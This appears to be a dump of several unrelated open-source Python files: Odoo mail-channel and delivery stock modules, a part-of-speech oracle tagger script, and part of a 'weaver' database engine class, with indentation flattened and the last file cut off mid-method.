for session_state in self.env['mail.channel.partner'].search(domain):
if not state:
state = session_state.fold_state
if session_state.fold_state == 'open':
state = 'folded'
else:
state = 'open'
session_state.write({
'fold_state': state,
'is_minimized': bool(state != 'closed'),
})
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), session_state.channel_id.channel_info()[0])
@api.model
def channel_minimize(self, uuid, minimized=True):
values = {
'fold_state': minimized and 'open' or 'closed',
'is_minimized': minimized
}
domain = [('partner_id', '=', self.env.user.partner_id.id), ('channel_id.uuid', '=', uuid)]
channel_partners = self.env['mail.channel.partner'].search(domain)
channel_partners.write(values)
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_partners.channel_id.channel_info()[0])
@api.model
def channel_pin(self, uuid, pinned=False):
# add the person in the channel, and pin it (or unpin it)
channel = self.search([('uuid', '=', uuid)])
channel_partners = self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', '=', channel.id)])
if not pinned:
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel.channel_info('unsubscribe')[0])
if channel_partners:
channel_partners.write({'is_pinned': pinned})
@api.multi
def channel_seen(self):
self.ensure_one()
if self.channel_message_ids.ids:
last_message_id = self.channel_message_ids.ids[0] # zero is the index of the last message
self.env['mail.channel.partner'].search([('channel_id', 'in', self.ids), ('partner_id', '=', self.env.user.partner_id.id)]).write({'seen_message_id': last_message_id})
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), {'info': 'channel_seen', 'id': self.id, 'last_message_id': last_message_id})
return last_message_id
@api.multi
def channel_invite(self, partner_ids):
""" Add the given partner_ids to the current channels and broadcast the channel header to them.
:param partner_ids : list of partner id to add
"""
partners = self.env['res.partner'].browse(partner_ids)
# add the partner
for channel in self:
partners_to_add = partners - channel.channel_partner_ids
channel.write({'channel_last_seen_partner_ids': [(0, 0, {'partner_id': partner_id}) for partner_id in partners_to_add.ids]})
for partner in partners_to_add:
notification = _('<div class="o_mail_notification">joined <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
self.message_post(body=notification, message_type="notification", subtype="mail.mt_comment", author_id=partner.id)
# broadcast the channel header to the added partner
self._broadcast(partner_ids)
#------------------------------------------------------
# Instant Messaging View Specific (Slack Client Action)
#------------------------------------------------------
@api.model
def get_init_notifications(self):
""" Get unread messages and old messages received less than AWAY_TIMER
ago of minimized channel ONLY. This aims to set the minimized channel
when refreshing the page.
Note : the user need to be logged
"""
# get current user's minimzed channel
minimized_channels = self.env['mail.channel.partner'].search([('is_minimized', '=', True), ('partner_id', '=', self.env.user.partner_id.id)]).mapped('channel_id')
# get the message since the AWAY_TIMER
threshold = datetime.datetime.now() - datetime.timedelta(seconds=AWAY_TIMER)
threshold = threshold.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
domain = [('channel_ids', 'in', minimized_channels.ids), ('create_date', '>', threshold)]
# get the message since the last poll of the user
presence = self.env['bus.presence'].search([('user_id', '=', self._uid)], limit=1)
if presence:
domain.append(('create_date', '>', presence.last_poll))
# do the message search
message_values = self.env['mail.message'].message_fetch(domain=domain)
# create the notifications (channel infos first, then messages)
notifications = []
for channel_info in minimized_channels.channel_info():
notifications.append([(self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info])
for message_value in message_values:
for channel_id in message_value['channel_ids']:
if channel_id in minimized_channels.ids:
message_value['channel_ids'] = [channel_id]
notifications.append([(self._cr.dbname, 'mail.channel', channel_id), dict(message_value)])
return notifications
@api.model
def channel_fetch_slot(self):
""" Return the channels of the user grouped by 'slot' (channel, direct_message or private_group), and
the mapping between partner_id/channel_id for direct_message channels.
:returns dict : the grouped channels and the mapping
"""
values = {}
my_partner_id = self.env.user.partner_id.id
pinned_channels = self.env['mail.channel.partner'].search([('partner_id', '=', my_partner_id), ('is_pinned', '=', True)]).mapped('channel_id')
# get the group/public channels
values['channel_channel'] = self.search([('channel_type', '=', 'channel'), ('public', 'in', ['public', 'groups']), ('channel_partner_ids', 'in', [my_partner_id])]).channel_info()
# get the pinned 'direct message' channel
direct_message_channels = self.search([('channel_type', '=', 'chat'), ('id', 'in', pinned_channels.ids)])
values['channel_direct_message'] = direct_message_channels.channel_info()
# get the private group
values['channel_private_group'] = self.search([('channel_type', '=', 'channel'), ('public', '=', 'private'), ('channel_partner_ids', 'in', [my_partner_id])]).channel_info()
return values
@api.model
def channel_search_to_join(self, name=None, domain=None):
""" Return the channel info of the channel the current partner can join
:param name : the name of the researched channels
:param domain : the base domain of the research
:returns dict : channel dict
"""
if not domain:
domain = []
domain = expression.AND([
[('channel_type', '=', 'channel')],
[('channel_partner_ids', 'not in', [self.env.user.partner_id.id])],
[('public', '!=', 'private')],
domain
])
if name:
domain = expression.AND([domain, [('name', 'ilike', '%'+name+'%')]])
return self.search(domain).read(['name', 'public', 'uuid', 'channel_type'])
@api.multi
def channel_join_and_get_info(self):
self.ensure_one()
if self.channel_type == 'channel' and not self.email_send:
notification = _('<div class="o_mail_notification">joined <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
self.message_post(body=notification, message_type="notification", subtype="mail.mt_comment")
self.action_follow()
channel_info = self.channel_info()[0]
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info)
return channel_info
@api.model
def channel_create(self, name, privacy='public'):
""" Create a channel and add the current partner, broadcast it (to make the user directly
listen to it when polling)
:param name : the name of the channel to create
:param privacy : privacy of the channel. Should be 'public' or 'private'.
:return dict : channel header
"""
# create the channel
new_channel = self.create({
'name': name,
'public': privacy,
'email_send': False,
'channel_partner_ids': [(4, self.env.user.partner_id.id)]
})
channel_info = new_channel.channel_info('creation')[0]
notification = _('<div class="o_mail_notification">created <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (new_channel.id, new_channel.name,)
new_channel.message_post(body=notification, message_type="notification", subtype="mail.mt_comment")
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info)
return channel_info
@api.model
def get_mention_suggestions(self, search, limit=8):
""" Return 'limit'-first channels' id, name and public fields such that the name matches a
'search' string. Exclude channels of type chat (DM), and private channels the current
user isn't registered to. """
domain = expression.AND([
[('name', 'ilike', search)],
[('channel_type', '=', 'channel')],
expression.OR([
[('public', '!=', 'private')],
[('channel_partner_ids', 'in', [self.env.user.partner_id.id])]
])
])
return self.search_read(domain, ['id', 'name', 'public'], limit=limit)
@api.model
def channel_fetch_listeners(self, uuid):
""" Return the id, name and email of partners listening to the given channel """
self._cr.execute("""
SELECT P.id, P.name, P.email
FROM mail_channel_partner CP
INNER JOIN res_partner P ON CP.partner_id = P.id
INNER JOIN mail_channel C ON CP.channel_id = C.id
WHERE C.uuid = %s""", (uuid,))
return self._cr.dictfetchall()
@api.multi
def channel_fetch_preview(self):
""" Return the last message of the given channels """
self._cr.execute("""
SELECT mail_channel_id AS id, MAX(mail_message_id) AS message_id
FROM mail_message_mail_channel_rel
WHERE mail_channel_id IN %s
GROUP BY mail_channel_id
""", (tuple(self.ids),))
channels_preview = dict((r['message_id'], r) for r in self._cr.dictfetchall())
last_messages = self.env['mail.message'].browse(channels_preview.keys()).message_format()
for message in last_messages:
channel = channels_preview[message['id']]
del(channel['message_id'])
channel['last_message'] = message
return channels_preview.values()
| gpl-3.0 |
eponvert/texnlp | src/main/python/oracle_tagger.py | 2 | 3346 | ###############################################################################
## Copyright (C) 2007 Jason Baldridge, The University of Texas at Austin
##
## This library is free software; you can redistribute it and#or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
##############################################################################
import sys
import gzip
import fnmatch
train_filename = sys.argv[1]
dict_filename = sys.argv[2]
test_filename = sys.argv[3]
if fnmatch.fnmatch(train_filename,"*.gz"):
train_file = gzip.open(train_filename)
else:
train_file = file(train_filename,"r")
if fnmatch.fnmatch(dict_filename,"*.gz"):
dict_file = gzip.open(dict_filename)
else:
dict_file = file(dict_filename,"r")
if fnmatch.fnmatch(test_filename,"*.gz"):
test_file = gzip.open(test_filename)
else:
test_file = file(test_filename,"r")
tag_set = set({})
tag_dict = {}
for line in dict_file:
line = line.strip()
if len(line) > 0:
word, tag = line.split()
if tag_dict.has_key(word):
tag_dict[word].add(tag)
else:
tag_dict[word] = set([tag])
tag_set.add(tag)
#tag_counts[tag] = tag_counts.get(tag, 0) + 1
print len(tag_set)
total = 0
max = 0
for word in tag_dict:
total += len(tag_dict[word])
if len(tag_dict[word]) > max:
max = len(tag_dict[word])
print max
print float(total)/len(tag_dict)
#num_tags = len(tag_set)
#
#tag_counts = {}
#for line in train_file:
# line = line.strip()
# if len(line) > 0:
# word, tag = line.split()
# if word in tag_dict:
# for tag in tag_dict[word]:
# tag_counts[tag] = tag_counts.get(tag, 0.0) + 1.0/len(tag_dict[word])
# #else:
# # for tag in tag_set:
# # tag_counts[tag] = tag_counts.get(tag, 0.0) + 1.0/num_tags
#
#
#most_freq_in_tag_dict = {}
#for word in tag_dict:
# most_freq_tag = ""
# highest = 0
# for tag in tag_dict[word]:
# if tag_counts[tag] > highest:
# most_freq_tag = tag
# highest = tag_counts[tag]
# most_freq_in_tag_dict[word] = most_freq_tag
#
#most_freq_tag = ""
#highest = 0
#for tag in tag_counts:
# if tag_counts[tag] > highest:
# most_freq_tag = tag
# highest = tag_counts[tag]
#
#for line in test_file:
# line = line.strip()
# if len(line) > 0:
# word, tag = line.split()
# if word in tag_dict:
# print word + "\t" + most_freq_in_tag_dict[word]
# #print word + "\t" + tag
# #if tag in tag_dict[word]:
# # print word + "\t" + tag
# #else:
# # print word + "\tKWUT:"+tag
# else:
# print word + "\t" + most_freq_tag
# #print word + "\t" + tag
# #print word + "\tUWUT:"+tag
#
# else:
# print
| lgpl-3.0 |
QianBIG/odoo | addons/delivery/stock.py | 1 | 10707 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
# Overloaded stock_picking to manage carriers :
class stock_picking(osv.osv):
_inherit = 'stock.picking'
def _cal_weight(self, cr, uid, ids, name, args, context=None):
res = {}
for picking in self.browse(cr, uid, ids, context=context):
total_weight = total_weight_net = 0.00
for move in picking.move_lines:
if move.state != 'cancel':
total_weight += move.weight
total_weight_net += move.weight_net
res[picking.id] = {
'weight': total_weight,
'weight_net': total_weight_net,
}
return res
def _get_picking_line(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('stock.move').browse(cr, uid, ids, context=context):
result[line.picking_id.id] = True
return result.keys()
_columns = {
'carrier_id':fields.many2one("delivery.carrier","Carrier"),
'volume': fields.float('Volume', copy=False),
'weight': fields.function(_cal_weight, type='float', string='Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_weight',
store={
'stock.picking': (lambda self, cr, uid, ids, c={}: ids, ['move_lines'], 40),
'stock.move': (_get_picking_line, ['state', 'picking_id', 'product_id','product_uom_qty','product_uom'], 40),
}),
'weight_net': fields.function(_cal_weight, type='float', string='Net Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_weight',
store={
'stock.picking': (lambda self, cr, uid, ids, c={}: ids, ['move_lines'], 40),
'stock.move': (_get_picking_line, ['state', 'picking_id', 'product_id','product_uom_qty','product_uom'], 40),
}),
'carrier_tracking_ref': fields.char('Carrier Tracking Ref', copy=False),
'number_of_packages': fields.integer('Number of Packages', copy=False),
'weight_uom_id': fields.many2one('product.uom', 'Unit of Measure', required=True,readonly="1",help="Unit of measurement for Weight",),
}
def _prepare_shipping_invoice_line(self, cr, uid, picking, invoice, context=None):
"""Prepare the invoice line to add to the shipping costs to the shipping's
invoice.
:param browse_record picking: the stock picking being invoiced
:param browse_record invoice: the stock picking's invoice
:return: dict containing the values to create the invoice line,
or None to create nothing
"""
carrier_obj = self.pool.get('delivery.carrier')
grid_obj = self.pool.get('delivery.grid')
currency_obj = self.pool.get('res.currency')
if not picking.carrier_id or \
any(inv_line.product_id.id == picking.carrier_id.product_id.id
for inv_line in invoice.invoice_line):
return None
grid_id = carrier_obj.grid_get(cr, uid, [picking.carrier_id.id],
picking.partner_id.id, context=context)
if not grid_id:
raise osv.except_osv(_('Warning!'),
_('The carrier %s (id: %d) has no delivery grid!') \
% (picking.carrier_id.name,
picking.carrier_id.id))
quantity = sum([line.product_uom_qty for line in picking.move_lines])
price = grid_obj.get_price_from_picking(cr, uid, grid_id,
invoice.amount_untaxed, picking.weight, picking.volume,
quantity, context=context)
if invoice.company_id.currency_id.id != invoice.currency_id.id:
price = currency_obj.compute(cr, uid, invoice.company_id.currency_id.id, invoice.currency_id.id,
price, context=dict(context or {}, date=invoice.date_invoice))
account_id = picking.carrier_id.product_id.property_account_income.id
if not account_id:
account_id = picking.carrier_id.product_id.categ_id\
.property_account_income_categ.id
taxes = picking.carrier_id.product_id.taxes_id
partner = picking.partner_id or False
fp = invoice.fiscal_position or partner.property_account_position
if partner:
account_id = self.pool.get('account.fiscal.position').map_account(cr, uid, fp, account_id)
taxes_ids = self.pool.get('account.fiscal.position').map_tax(cr, uid, fp, taxes)
else:
taxes_ids = [x.id for x in taxes]
return {
'name': picking.carrier_id.name,
'invoice_id': invoice.id,
'uos_id': picking.carrier_id.product_id.uos_id.id,
'product_id': picking.carrier_id.product_id.id,
'account_id': account_id,
'price_unit': price,
'quantity': 1,
'invoice_line_tax_id': [(6, 0, taxes_ids)],
}
def _invoice_create_line(self, cr, uid, moves, journal_id, inv_type='out_invoice', context=None):
invoice_obj = self.pool.get('account.invoice')
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_ids = super(stock_picking, self)._invoice_create_line(cr, uid, moves, journal_id, inv_type=inv_type, context=context)
delivey_invoices = {}
for move in moves:
for invoice in move.picking_id.sale_id.invoice_ids:
if invoice.id in invoice_ids:
delivey_invoices[invoice] = move.picking_id
if delivey_invoices:
for invoice, picking in delivey_invoices.items():
invoice_line = self._prepare_shipping_invoice_line(cr, uid, picking, invoice, context=context)
if invoice_line:
invoice_line_obj.create(cr, uid, invoice_line)
invoice_obj.button_compute(cr, uid, [invoice.id], context=context, set_total=(inv_type in ('in_invoice', 'in_refund')))
return invoice_ids
def _get_default_uom(self, cr, uid, context=None):
uom_categ_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'product.product_uom_categ_kgm')
return self.pool.get('product.uom').search(cr, uid, [('category_id', '=', uom_categ_id), ('factor', '=', 1)])[0]
_defaults = {
'weight_uom_id': lambda self, cr, uid, c: self._get_default_uom(cr, uid, c),
}
class stock_move(osv.osv):
_inherit = 'stock.move'
def _cal_move_weight(self, cr, uid, ids, name, args, context=None):
res = {}
uom_obj = self.pool.get('product.uom')
for move in self.browse(cr, uid, ids, context=context):
weight = weight_net = 0.00
if move.product_id.weight > 0.00:
converted_qty = move.product_qty
weight = (converted_qty * move.product_id.weight)
if move.product_id.weight_net > 0.00:
weight_net = (converted_qty * move.product_id.weight_net)
res[move.id] = {
'weight': weight,
'weight_net': weight_net,
}
return res
_columns = {
'weight': fields.function(_cal_move_weight, type='float', string='Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_move_weight',
store={
'stock.move': (lambda self, cr, uid, ids, c=None: ids, ['product_id', 'product_uom_qty', 'product_uom'], 30),
}),
'weight_net': fields.function(_cal_move_weight, type='float', string='Net weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_move_weight',
store={
'stock.move': (lambda self, cr, uid, ids, c=None: ids, ['product_id', 'product_uom_qty', 'product_uom'], 30),
}),
'weight_uom_id': fields.many2one('product.uom', 'Unit of Measure', required=True,readonly="1",help="Unit of Measure (Unit of Measure) is the unit of measurement for Weight",),
}
def action_confirm(self, cr, uid, ids, context=None):
"""
Pass the carrier to the picking from the sales order
(Should also work in case of Phantom BoMs when on explosion the original move is deleted)
"""
procs_to_check = []
for move in self.browse(cr, uid, ids, context=context):
if move.procurement_id and move.procurement_id.sale_line_id and move.procurement_id.sale_line_id.order_id.carrier_id:
procs_to_check += [move.procurement_id]
res = super(stock_move, self).action_confirm(cr, uid, ids, context=context)
pick_obj = self.pool.get("stock.picking")
for proc in procs_to_check:
pickings = list(set([x.picking_id.id for x in proc.move_ids if x.picking_id and not x.picking_id.carrier_id]))
if pickings:
pick_obj.write(cr, uid, pickings, {'carrier_id': proc.sale_line_id.order_id.carrier_id.id}, context=context)
return res
def _get_default_uom(self, cr, uid, context=None):
uom_categ_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'product.product_uom_categ_kgm')
return self.pool.get('product.uom').search(cr, uid, [('category_id', '=', uom_categ_id),('factor','=',1)])[0]
_defaults = {
'weight_uom_id': lambda self, cr, uid, c: self._get_default_uom(cr, uid, c),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
henrykironde/weaverhenry | lib/engine.py | 1 | 27970 | import sys
import os
import getpass
import zipfile
import gzip
import tarfile
import urllib
import json
from weaver import DATA_SEARCH_PATHS, DATA_WRITE_PATH
from weaver.lib.warning import Warning
class Engine():
"""A generic database system. Specific database platforms will inherit
from this class."""
name = ""
instructions = "Enter your database connection information:"
db = None
table = None
_connection = None
_cursor = None
datatypes = []
required_opts = []
pkformat = "%s PRIMARY KEY"
script = None
debug = False
warnings = []
opts={}
def url_string(self):
pass
def db_connect(self):
pass
def create_joins(self):
pass
def create_query(self,config):
"""
returns the sql statement required to join the tables.
The join flavor used in left outer join and the first table is considered
as the base table
"""
# read configurations from json settings file
with open(config) as json_data_file:
data = json.load(json_data_file)
unique_tables = set() # avoid repetition on table processing
number_of_joins = len(data['tables'])
processed_tables = 0 # number of processed tables
query_string = ""
item = 0
for items in data['tables']:
# loops through consecutive joins on two considered tables
number_of_tables = len(items["join"])
current_table = 0
if len(unique_tables) == 0 and processed_tables == 0:
query_string += " SELECT * FROM ( "
else:
query_string += " LEFT OUTER JOIN "
# SQL += "JOIN ("
for table in items["join"]: # look up the tables
if table not in unique_tables:
if len(unique_tables) == 0:
query_string += " SELECT "
else:
if current_table == 0:
query_string += " ( SELECT "
else:
query_string += " LEFT OUTER JOIN ( SELECT "
# use the table name to get the values of attributes
# Select <Attributes>
attributes = data[table]["attributes_to_project"]
attribute_length = len(data[table]["attributes_to_project"])
# select attribute, attribute, ...[,]
for attribute in attributes:
if attribute_length == 1:
query_string += (attribute + " ")
else:
query_string += (attribute + ", ")
attribute_length -= 1
# Select <Attributes> FROM <Tablename >
query_string += "FROM "
query_string += data[table]["database_name"] + "." + table + " "
# add a join <JOIN ( SELECT> if there are more expected tables and Using clause
# add alias for the derived tables
if len(unique_tables) == 0:
query_string += " ) " + "temp" + str(item)
item += 1
else:
query_string += " ) "
current_table += 1
number_of_tables -= 1 # decrese the nuber of tables
unique_tables.add(table) # add the table so that we do not join it again
processed_tables += 1
query_string += " temp" + str(item) + " USING ("
item += 1
pivot_len = len(items["join_on"]) # number of attributes used in the join
for pivots in items["join_on"]:
if pivot_len == 1:
query_string += pivots
else:
query_string += pivots + ", "
pivot_len -= 1
query_string += ")"
number_of_joins -= 1
return query_string+";"
def connect(self, force_reconnect=False):
if force_reconnect: self.disconnect()
if self._connection is None:
self._connection = self.get_connection()
return self._connection
connection = property(connect)
def disconnect(self):
if self._connection:
self.connection.close()
self._connection = None
self._cursor = None
def get_connection(self):
'''This method should be overloaded by specific implementations
of Engine.'''
pass
def add_to_table(self, data_source):
"""This function adds data to a table from one or more lines specified
in engine.table.source."""
if self.table.columns[-1][1][0][:3] == "ct-":
# cross-tab data
lines = gen_from_source(data_source)
real_lines = []
for line in lines:
split_line = line.strip('\n\r\t ').split(self.table.delimiter)
initial_cols = len(self.table.columns) - (3 if hasattr(self.table, "ct_names") else 2)
begin = split_line[:initial_cols]
rest = split_line[initial_cols:]
n = 0
for item in rest:
if hasattr(self.table, "ct_names"):
name = [self.table.ct_names[n]]
n += 1
else:
name = []
real_lines.append(self.table.delimiter.join(begin + name + [item]))
real_line_length = len(real_lines)
else:
# this function returns a generator that iterates over the lines in
# the source data
def source_gen():
return (line for line in gen_from_source(data_source)
if line.strip('\n\r\t '))
# use one generator to compute the length of the input
real_lines, len_source = source_gen(), source_gen()
real_line_length = sum(1 for _ in len_source)
total = self.table.record_id + real_line_length
for line in real_lines:
if not self.table.fixed_width: line = line.strip()
if line:
self.table.record_id += 1
linevalues = self.table.values_from_line(line)
types = self.table.get_column_datatypes()
# Build insert statement with the correct # of values
try:
cleanvalues = [self.format_insert_value(self.table.cleanup.function
(linevalues[n],
self.table.cleanup.args),
types[n])
for n in range(len(linevalues))]
except Exception as e:
self.warning('Exception in line %s: %s' % (self.table.record_id, e))
continue
try:
insert_stmt = self.insert_statement(cleanvalues)
except:
if self.debug: print types
if self.debug: print linevalues
if self.debug: print cleanvalues
raise
try:
update_frequency = int(self.update_frequency)
except:
update_frequency = 100
if (self.table.record_id % update_frequency == 0
or self.table.record_id == 1
or self.table.record_id == total):
prompt = "Inserting rows to " + self.table_name() + ": "
prompt += str(self.table.record_id) + " / " + str(total)
sys.stdout.write(prompt + "\b" * len(prompt))
try:
self.execute(insert_stmt, commit=False)
except:
print insert_stmt
raise
print
self.connection.commit()
def auto_create_table(self, table, url=None, filename=None, pk=None):
"""Creates a table automatically by analyzing a data source and
predicting column names, data types, delimiter, etc."""
if url and not filename:
filename = filename_from_url(url)
self.table = table
if url and not self.find_file(filename):
# If the file doesn't exist, download it
self.download_file(url, filename)
file_path = self.find_file(filename)
source = (skip_rows,
(self.table.column_names_row - 1,
(open, (file_path, "rb"))))
lines = gen_from_source(source)
header = lines.next()
lines.close()
source = (skip_rows,
(self.table.header_rows,
(open, (file_path, "rb"))))
if not self.table.delimiter:
self.auto_get_delimiter(header)
if not self.table.columns:
lines = gen_from_source(source)
if pk is None:
self.table.columns = [("record_id", ("pk-auto",))]
else:
self.table.columns = []
self.table.contains_pk = True
columns, column_values = self.table.auto_get_columns(header)
self.auto_get_datatypes(pk, lines, columns, column_values)
if self.table.columns[-1][1][0][:3] == "ct-" and hasattr(self.table, "ct_names") and not self.table.ct_column in [c[0] for c in self.table.columns]:
self.table.columns = self.table.columns[:-1] + [(self.table.ct_column, ("char", 20))] + [self.table.columns[-1]]
self.create_table()
# def auto_get_datatypes(self, pk, source, columns, column_values):
# """Determines data types for each column."""
# # Get all values for each column
# if hasattr(self, 'scan_lines'):
# lines = int(self.scan_lines)
# lines_to_scan = []
# n = 0
# while n < lines:
# lines_to_scan.append(source.next())
# n += 1
# else:
# lines_to_scan = source
#
# column_types = [('int',) for i in range(len(columns))]
# max_lengths = [0 for i in range(len(columns))]
#
# # Check the values for each column to determine data type
# for line in lines_to_scan:
# if line.replace("\t", "").strip():
# values = self.table.extract_values(line.strip("\n"))
# for i in range(len(columns)):
# try:
# value = values[i]
#
# if self.table.cleanup.function != no_cleanup:
# value = self.table.cleanup.function(value, self.table.cleanup.args)
#
# if value != None and value != '':
# if len(str(value)) > max_lengths[i]:
# max_lengths[i] = len(str(value))
#
# if column_types[i][0] in ('int', 'bigint'):
# try:
# value = int(value)
# if column_types[i][0] == 'int' and hasattr(self, 'max_int') and value > self.max_int:
# column_types[i] = ['bigint',]
# except:
# column_types[i] = ['double',]
# if column_types[i][0] == 'double':
# try:
# value = float(value)
# if "e" in str(value) or ("." in str(value) and
# len(str(value).split(".")[1]) > 10):
# column_types[i] = ["decimal","30,20"]
# except:
# column_types[i] = ['char',max_lengths[i]]
# if column_types[i][0] == 'char':
# if len(str(value)) > column_types[i][1]:
# column_types[i][1] = max_lengths[i]
#
# except IndexError:
# pass
#
#
# for i in range(len(columns)):
# column = columns[i]
# column[1] = column_types[i]
# if pk == column[0]:
# column[1][0] = "pk-" + column[1][0]
#
# for column in columns:
# self.table.columns.append((column[0], tuple(column[1])))
def auto_get_delimiter(self, header):
# Determine the delimiter by finding out which of a set of common
# delimiters occurs most in the header line
self.table.delimiter = "\t"
for other_delimiter in [",", ";"]:
if header.count(other_delimiter) > header.count(self.table.delimiter):
self.table.delimiter = other_delimiter
def convert_data_type(self, datatype):
"""Converts generic data types to database platform specific
data types"""
thistype = datatype[0]
thispk = False
if thistype[0:3] == "pk-":
thistype = thistype.lstrip("pk-")
thispk = True
elif thistype[0:3] == "ct-":
thistype = thistype[3:]
if thistype in self.datatypes.keys():
thistype = self.datatypes[thistype]
if isinstance(thistype, tuple):
if len(datatype) > 1 and datatype[1] > 0:
thistype = thistype[1] + "(" + str(datatype[1]) + ")"
else:
thistype = thistype[0]
else:
if len(datatype) > 1 and datatype[1] > 0:
thistype += "(" + str(datatype[1]) + ")"
else:
thistype = ""
if thispk:
thistype = self.pkformat % thistype
return thistype
def create_db(self):
"""Creates a new database based on settings supplied in Database object
engine.db"""
db_name = self.database_name()
if db_name:
print "Creating database " + db_name + "..."
# Create the database
create_stmt = self.create_db_statement()
if self.debug: print create_stmt
try:
self.execute(create_stmt)
except Exception as e:
try: self.connection.rollback()
except: pass
print "Couldn't create database (%s). Trying to continue anyway." % e
def create_db_statement(self):
"""Returns a SQL statement to create a database."""
create_stmt = "CREATE DATABASE " + self.database_name()
return create_stmt
def create_raw_data_dir(self):
"""Checks to see if the archive directory exists and creates it if
necessary."""
path = self.format_data_dir()
if not os.path.exists(path):
os.makedirs(path)
def create_table(self):
"""Creates a new database table based on settings supplied in Table
object engine.table."""
print "Creating table " + self.table_name() + "..."
# Try to drop the table if it exists; this may cause an exception if it
# doesn't exist, so ignore exceptions
try:
self.execute(self.drop_statement("TABLE", self.table_name()))
except:
pass
create_stmt = self.create_table_statement()
if self.debug: print create_stmt
try:
self.execute(create_stmt)
except Exception as e:
try: self.connection.rollback()
except: pass
print "Couldn't create table (%s). Trying to continue anyway." % e
def create_table_statement(self):
"""Returns a SQL statement to create a table."""
create_stmt = "CREATE TABLE " + self.table_name() + " ("
columns = self.table.get_insert_columns(join=False)
types = []
for column in self.table.columns:
for column_name in columns:
if column[0] == column_name:
types.append(self.convert_data_type(column[1]))
if self.debug: print columns
column_strings = []
for c, t in zip(columns, types):
column_strings.append(c + ' ' + t)
create_stmt += ', '.join(column_strings)
create_stmt += " );"
return create_stmt
def database_name(self, name=None):
if not name:
try:
name = self.script.shortname
except AttributeError:
name = "{db}"
try:
db_name = self.opts["database_name"].format(db=name)
except KeyError:
db_name = name
return db_name
def download_file(self, url, filename, clean_line_endings=True):
"""Downloads a file to the raw data directory."""
if not self.find_file(filename):
path = self.format_filename(filename)
self.create_raw_data_dir()
print "Downloading " + filename + "..."
file = urllib.urlopen(url)
local_file = open(path, 'wb')
if clean_line_endings and (filename.split('.')[-1].lower() not in ["exe", "zip", "xls"]):
local_file.write(file.read().replace("\r\n", "\n").replace("\r", "\n"))
else:
local_file.write(file.read())
local_file.close()
file.close()
def download_files_from_archive(self, url, filenames, filetype="zip",
keep_in_dir=False, archivename=None):
"""Downloads files from an archive into the raw data directory.
"""
downloaded = False
if archivename:
archivename = self.format_filename(archivename)
else:
archivename = self.format_filename(filename_from_url(url))
if keep_in_dir:
archivebase = os.path.splitext(os.path.basename(archivename))[0]
archivedir = os.path.join(DATA_WRITE_PATH, archivebase)
archivedir = archivedir.format(dataset=self.script.shortname)
if not os.path.exists(archivedir):
os.makedirs(archivedir)
else:
archivebase = ''
for filename in filenames:
if self.find_file(os.path.join(archivebase, filename)):
# Use local copy
pass
else:
self.create_raw_data_dir()
if not downloaded:
self.download_file(url, archivename, clean_line_endings=False)
downloaded = True
if filetype == 'zip':
archive = zipfile.ZipFile(archivename)
open_archive_file = archive.open(filename)
elif filetype == 'gz':
#gzip archives can only contain a single file
open_archive_file = gzip.open(archivename)
elif filetype == 'tar':
archive = tarfile.open(filename)
open_archive_file = archive.extractfile(filename)
fileloc = self.format_filename(os.path.join(archivebase,
os.path.basename(filename)))
unzipped_file = open(fileloc, 'wb')
for line in open_archive_file:
unzipped_file.write(line)
open_archive_file.close()
unzipped_file.close()
if 'archive' in locals(): archive.close()
def drop_statement(self, objecttype, objectname):
"""Returns a drop table or database SQL statement."""
dropstatement = "DROP %s IF EXISTS %s" % (objecttype, objectname)
return dropstatement
def escape_single_quotes(self, value):
return value.replace("'", "\\'")
def escape_double_quotes(self, value):
return value.replace('"', '\\"')
def execute(self, statement, commit=True):
self.cursor.execute(statement)
if commit:
self.connection.commit()
def exists(self, script):
return all([self.table_exists(
script.shortname,
key
)
for key in script.urls.keys() if key])
def final_cleanup(self):
"""Close the database connection."""
if self.warnings:
print '\n'.join(str(w) for w in self.warnings)
self.disconnect()
def find_file(self, filename):
for search_path in DATA_SEARCH_PATHS:
